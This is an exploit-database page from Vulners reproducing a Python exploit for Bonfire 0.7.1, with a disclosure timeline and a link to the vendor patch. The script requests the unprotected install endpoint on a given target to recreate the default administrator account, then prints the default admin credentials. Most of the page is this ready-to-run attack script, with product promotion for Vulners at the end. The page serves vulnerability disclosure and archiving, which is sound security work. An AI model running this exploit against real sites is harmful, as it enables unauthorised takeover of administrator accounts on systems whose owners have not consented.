Vulners
Lucene search
Bonefire 0.7.1 - Reinstall Admin Account
#!/usr/bin/env python
# coding: utf-8
#
# Bonefire v.0.7.1 Reinstall Admin Account Exploit
#
# Author : Mehmet INCE
#
# Analysis write-up : http://www.mehmetince.net/ci-bonefire-reinstall-admin-account-vulnerability-analysis-exploit/
#
# Description :
# Forgotten controls lead to call install module which lead to
# create default administrator account again!
#
# TIMELINE
# 21 Apr 2014 14:00 –Vulnerability found
# 23 Apr 2014 21:20 – Analysis and write-up completed
# 23 Apr 2014 21:29 – First contact with lead developer of Bonfire
# 23 Apr 2014 21:33 – Response from lead developer
# 23 Apr 2014 21:52 – Vulnerability confirmed by lead developer
# 23 Apr 2014 21:55 – Vulnerability has been patched via following commit
# https://github.com/ci-bonfire/Bonfire/commit/9cb76c66babf89952c3d48279b026c59e198f46e
import urllib2
import sys
import re
target = sys.argv[1]
path = sys.argv[2]
if len(sys.argv) > 3:
print "Usage : python bonfire www.target.com /path/"
exit(0)
content = urllib2.urlopen(target+path+"index.php/install/do_install").read()
if re.search('[[email protected]]', content):
print "Target is vulnerable!"
print "Username : [email protected]"
print "Password : password"
else:
print "Target is not vulnerable..."Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Apr 2014 00:00Current